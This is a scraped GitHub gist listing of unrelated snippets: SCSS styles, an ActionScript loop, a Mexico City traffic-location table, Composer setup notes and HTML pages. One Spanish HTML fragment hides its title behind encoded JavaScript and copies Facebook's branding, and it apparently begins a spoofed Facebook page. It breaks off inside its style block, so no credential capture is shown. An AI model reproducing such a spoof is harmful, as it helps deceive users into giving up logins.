Skip to content

Instantly share code, notes, and snippets.

@keyframes fadeInDown
from
opacity: 0;
transform: translate3d(0, -40%, 0)
to
opacity: 1;
transform: none
$totaItems: 10;
#examples
@keyframes fadeInDown
from
opacity: 0;
transform: translate3d(0, -40%, 0)
to
opacity: 1;
transform: none
$totaItems: 10;
#examples
@yorkfx
yorkfx / grid.scss
Created October 11, 2017 23:26
Grid Background
#container{
width: 600px;
height:600px;
border-right:1px solid rgba(0,0,0,.2);
border-bottom:1px solid rgba(0,0,0,.2);
position: relative;
background-image:
linear-gradient(90deg, rgba(0,0,0,.2) 1px, rgba(255,255,255,0) 1px, rgba(255,255,255,0) 100px),
linear-gradient(180deg, rgba(0,0,0,.2) 1px, rgba(255,255,255,0) 1px, rgba(255,255,255,0) 100px);
@yorkfx
yorkfx / Action Script
Created March 31, 2017 22:36
Loop Timeline
if(!this.alreadyExecuted){
this.alreadyExecuted=true;
this.loopNum=1;
}
else {
this.loopNum++;
if(this.loopNum==3){
this.stop();
}
}
No. UT SECTOR-ID SECTOR DIRECCION
1 01530 AOB-01 PLATEROS
BLVD.ADOLFO LOPEZ MATEOS Y CAMINO REAL A TOLUCA DIRECCION SUR.
2 01242 AOB-01 PLATEROS
PERIFERICO 2DO PISO DE NORTE A SUR A LA ALTURA PROL.RIO SAN ANGEL/
ATLAMAYA
3 01257 AOB-01 PLATEROS
PERIFERICO 2DO. PISO DE NORTE A SUR A LA ALTURA DE DR. S. GLEZ.
HERREJON
4 01290 AOB-03 ALPES
li {
flex: 0 1 20%;
text-align: center;
a {
font-weight: 100;
display: inline-flex;
justify-content: center;
align-items: center;
padding: 0 18px;
height: 50px;
@yorkfx
yorkfx / read.md
Created November 30, 2016 16:45
Install Composer MacOX MAMP

Here's how I did it

Enter in Terminal:

nano ~/.bash_profile

#Then add the following

export MAMP_PHP=/Applications/MAMP/bin/php/php5.5.26/bin export PATH="$MAMP_PHP:$PATH" Hit Ctrl + X to save

@yorkfx
yorkfx / index.html
Created November 18, 2016 19:39 — forked from anonymous/index.html
Capture FB Reactions count and show them on webpage
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>My FB Reactions Page</title>
<style>
html {
box-sizing: border-box;
width: 100%;
<!DOCTYPE html>
<html lang="es"><head><meta charset="UTF-8">
<script Language='Javascript'>document.write(unescape('%3C%74%69%74%6C%65%3E%54%65%20%64%61%6D%6F%73%20%6C%61%20%62%69%65%6E%76%65%6E%69%64%61%20%61%20%46%61%63%65%62%6F%6F%6B%3C%2F%74%69%74%6C%65%3E%0A'));</script>
<style>
body{margin:0;padding:0;background-color:#eceff5;font-family:sans-serif;font-size:14px}header{background-color:#3b5997;height:56px;width:100%;display:block;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAE0AAAAQCAQAAAD5EDoSAAAC8ElEQVR4Ac3VA5BsVxDG8Zln27Ztm4vYtm3bNouxbacY28az7dlfbp2cujWZ3WhL24P7dZ/uW//jzJ+mjrH2tLtWmUqa1kYo1qSS1dX0MtGU8g0D/AAoqTTaC2BQJavbg3fLN7wCyqwzp6qhrcNWbYJTldDUB98lsmqhKbIz+F2RIs2SSDPbO9ksWVMUmR7zmprlGMcpUjP4zRU5wf4G/xXNICfYV7dMajrawcl20T0vVtN4hznKJHUK0XQNJIMyAICBxlkEuMGPWBTSD7ICwE2Jf6CVAO5VJ0W7WA5sdXSoq+5CWwBlbowgg30K4Hvj89HU9AVyxhaitfYLWO4bbBPQTAT85CPrFRklh4Wu9xg4I0Xjd79GkP5J9Giw2Rc2COhJrJ7fwDy/gBVaSNGcBW7JJLKFLpG+hRZKwbvqJi0nENFeBifHlVnTw2B08N/GzynavbKJvgHcnKilAWxgojpbiU3qO1Zh5kUimu42Yp5G
@yorkfx
yorkfx / gist:a6bf3b340b7a8b8519a4
Created March 18, 2015 03:45
placeholder scss
@mixin placeholder {
&::-webkit-input-placeholder {@content}
&:-moz-placeholder {@content}
&::-moz-placeholder {@content}
&:-ms-input-placeholder {@content}
}
@include placeholder {color:rgba(255,255,255,.8);}